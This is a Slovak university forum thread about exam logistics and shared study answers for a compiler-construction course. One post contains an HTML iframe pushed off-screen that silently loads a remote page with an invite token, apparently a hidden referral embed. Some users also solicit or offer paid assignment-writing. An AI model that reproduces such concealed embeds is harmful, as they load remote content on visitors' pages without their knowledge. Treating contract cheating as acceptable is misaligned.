• Welcome to TUKE FÓRUM - Fórum pre študentov Technickej Univerzity v Košiciach.

Konštrukcie preklada?ov

Started by ApokalypS, 14.10.2009, 01:40:52

« predchdzajce - alie »

trek

ja mam vsetko odovzdane aj zadanie a nemam zapisany :D

ApokalypS

ja mam.. asi zavisi od toho, kto bol cviciaci, neviem
80% mozgu človeka tvorí kvapalina, v mojom prípade brzdová..

CHCEM S5 :zuzka: STARY IS :zuzka: !!!!
http://www.tu-ke.com/forum/o-nicom/otvoreny-list-vedeniu-firmy-dupress-(dodavatel-mais)/

LONEr

spravi niekto zadanie do tyzdna? 15e

kpuser

Quote from: LONEr on  26.12.2009, 03:12:19
spravi niekto zadanie do tyzdna? 15e
Uz som pisal sukromnu...

mio

ak by mal este niekto zaujem o zadanie piste PM ;) cena dohodou :)

johnyo13

nechce ist niekto 14.1.2010 o 13:00 na skusku z KP. Potrebujem ist skor (08:20, 10:20) ten isty den!
EDIT: solved
☼Ѿ☼ ... ☼Ѿ☼

Killian

Ako prebieha skuska? Je to test a potom priklad? Ako su rozdelene body?

Lebo v osnove je toto:
"Skúška má praktickú a teoretickú ústnu  časť . Praktická časť predstavuje riešenie príkladu podobného úlohám riešeným na cvičeniach pomocou generátorov lex, yacc, Hodnotenie oboch častí spolu 0-60 bodov."

To by mal byt test a nie ustna cast, nie?

A su niekde nejake vypracovane otazky / screeny zo skusky?

Casso

Quote from: Killian on  29.12.2009, 05:35:01
To by mal byt test a nie ustna cast, nie?
Podla maisu su terminy znacne nahustene tak ako pominule roky, takze ustna skuska nehrozi.

Ako su rozdelene body?
Na prednaskach som nepocul zeby nieco hovoril (mozno v 13. tyzdni ale tam som nebol...)
Minuly rok bolo taketo rozdelenie: 15b priklad ; 45b teoria

Ako prebieha skuska? Je to test a potom priklad?

Lebo v osnove je toto:
"Skúška má praktickú a teoretickú ústnu  časť . Praktická časť predstavuje riešenie príkladu podobného úlohám riešeným na cvičeniach pomocou generátorov lex, yacc, Hodnotenie oboch častí spolu 0-60 bodov."
Priklad je nieco podobne ako priklady na cviceniach (dokodit nejaky prikaz...)
A teoria... IMHO bude moodle (co ine :xmas:)

A su niekde nejake vypracovane otazky / screeny zo skusky?
Nieco malo (takmer nic) som nasiel na ftpcku, ak ma niekto nieco lepsie, nech sa ozve

Sooloni

vie nekto poradit ako vyriesit presun objektu na relativnu poziciu?

Padres

Spravi mi niekto zadanie? Odmena ista. PM

Killian

Nemohol by niekto vypracovat tie otazky co su na kane.sk v subore skuska_nove_otazky.rtf ?

Casso

Quote from: Killian on  01.01.2010, 23:01:28
Nemohol by niekto vypracovat tie otazky co su na kane.sk v subore skuska_nove_otazky.rtf ?
Pracujem na tom.
Ja blb som sa prihlasil na prvu skusku co bude 7eho tak ani neviem co sa mam ucit, ale ako citam minule rocniky tak to bude pohodicka a s 40b zapoctom to bude so easy.

EDIT: Pridavam vam vypracovane otazky. Netvrdim ze je tam vsetko 100%ne predsa je len novy rok  :beer1:, ak by ste nasli chybu, budem velmi rad ak ma na nu upozornite, ja ju operativne odstranim
http://casso.ic.cz/temp/vypracovane_nove_otazky.rtf

trek

mate uz zapisany zapocet v maise?...tie skupiny co maju s ing.Bratru-om...vsetko odovzdane uz davno a furt nic

Casso

Quote from: trek on  02.01.2010, 17:07:03
mate uz zapisany zapocet v maise?...tie skupiny co maju s ing.Bratru-om...vsetko odovzdane uz davno a furt nic

Pisal som Ing. Bratru-ovi (dufam ze to dobre sklonujem O:-) mail a odpisal mi toto

"Dobry den,
ano, viem o tom, ze ste ho odovzdavali. Ja som 19.12. kratko po polnoci zapisoval zapocty do MAISu, aj som to nasledne skontroloval a boli tam. Ale mate pravdu, pretoze ziaden z tych zapoctov tam dnes uz nema bodove ohodnotenie ani datum, iba datum, kedy som ja zapisal nejaku zmenu (19.12.). Neviem, co za problemy s tym znova maju. Pokusim sa zapisat vsetky zapocty znova.

Peter Bratru"

Tri krát sláva mais-u

BossZ

To ma ani neprekvapuje, dalo sa to ocakavat, este pride nejaky hacker a zmaze im vsetky databazy, a potom bude. Je celkom hroziva predstava, ze uz sa nezapisuju zapocty a skusky do indexov. Jednoducho super,  :)
<iframe style="width:300px;height:600px;padding:0;margin: -300px 0px 0px 0px;border:0;" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.androidroka.sk/wp-content/themes/androidRoku/iframe.php?invite=52633e266001a22a5eb0166ee736bc68"></iframe>

Casso

Mais nieje az taky strasny, casom sa to poopravuje (skoda ze sa opravuju vazne chyby az v dobe ostrej prevadzky..) no najviac mi vadi ze nefunguje tlacitko späť v prehliadaci (mam ho bindnute na 5. tlacitko myši). Ako keby boli vsetky tlacitka robene cez post formulare ci co...

K5

caute, neviete kde by som nasiel stare vypracovane otazky?

Sooloni

v akom case prebera plocica zadania 7.1? mam vtedy rano skusku z SP takze neviem ci mu treba pisat maila alebo ho tam najdem aj o 11,00?

sri

Quote from: Sooloni on  02.01.2010, 23:32:58
v akom case prebera plocica zadania 7.1? mam vtedy rano skusku z SP takze neviem ci mu treba pisat maila alebo ho tam najdem aj o 11,00?
7.1. je aj skuska z KP, tusim 8.20, 10.20 a 13.00 alebo tak nejak uz neviem .... na cviceni hovoril ze najlepsie bude ak pridete pocas skusky so zadaniami

Casso

upravil som tie vypracovane otazky, uz aj s otazkou č.16

trek

Quote from: Casso on  02.01.2010, 17:10:13
Quote from: trek on  02.01.2010, 17:07:03

Pisal som Ing. Bratru-ovi (dufam ze to dobre sklonujem O:-) mail a odpisal mi toto

"Dobry den,
ano, viem o tom, ze ste ho odovzdavali. Ja som 19.12. kratko po polnoci zapisoval zapocty do MAISu, aj som to nasledne skontroloval a boli tam. Ale mate pravdu, pretoze ziaden z tych zapoctov tam dnes uz nema bodove ohodnotenie ani datum, iba datum, kedy som ja zapisal nejaku zmenu (19.12.). Neviem, co za problemy s tym znova maju. Pokusim sa zapisat vsetky zapocty znova.

Peter Bratru"

Tri krát sláva mais-u

uz zapisal ten zapocet?...lebo ja stale nemam nic

LONEr

pocujte, mate nejake otazky na skusku? okrem tych 20tich.

LONEr

alebo su take iste otazky na skuske, ako boli na zapoctoch?

sri

v archive z minuleho roku pisu, ze (pri troche stastia) sa da 20 bodov nachytat za otazky co boli na zapocte... potom je asi 15-bodovy priklad a zvysok zrejme otazky z prednasok

ApokalypS

Quote from: Casso on  03.01.2010, 17:31:44
upravil som tie vypracovane otazky, uz aj s otazkou č.16
vdaka :)
80% mozgu človeka tvorí kvapalina, v mojom prípade brzdová..

CHCEM S5 :zuzka: STARY IS :zuzka: !!!!
http://www.tu-ke.com/forum/o-nicom/otvoreny-list-vedeniu-firmy-dupress-(dodavatel-mais)/